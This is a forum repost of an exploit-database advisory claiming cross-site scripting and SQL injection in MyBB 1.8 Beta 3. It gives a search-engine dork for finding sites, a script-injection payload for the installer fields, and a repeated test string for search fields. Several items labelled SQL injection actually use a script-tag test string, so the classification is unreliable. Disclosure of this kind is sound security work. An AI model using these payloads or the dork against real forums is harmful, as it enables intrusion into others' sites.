Nytro Posted August 21, 2014 Report Posted August 21, 2014 # Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection# Google Dork: intext:"Powered By MyBB"# Date: 15.08.2014# Author: DemoLisH# Vendor Homepage: http://www.mybb.com/# Software Link: http://www.mybb.com/downloads# Version: 1.8 - Beta 3# Contact: onur@b3yaz.org***************************************************a) Cross Site Scripting in Installation Wizard ( Board Configuration )Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.phpNow let's finish setup and go to the homepage. SQL Injection in Private Messages ( User CP )Go to -> Inbox, for example:localhost/private.phpSearch at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onloadc) SQL Injection in ShowthreadGo to -> Show Thread, for example:localhost/showthread.php?tid=1Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onloadd) SQL Injection in SearchGo to -> Search, for example:localhost/search.phpSearch at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onloade) SQL Injection in Help DocumentsGo to -> Help Documents, for example:localhost/misc.php?action=helpSearch at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onloadf) SQL Injection in Forum DisplayGo to -> Forum Display, for example:localhost/forumdisplay.php?fid=2Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload***************************************************[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.Sursa: http://www.exploit-db.com/exploits/34381/ Quote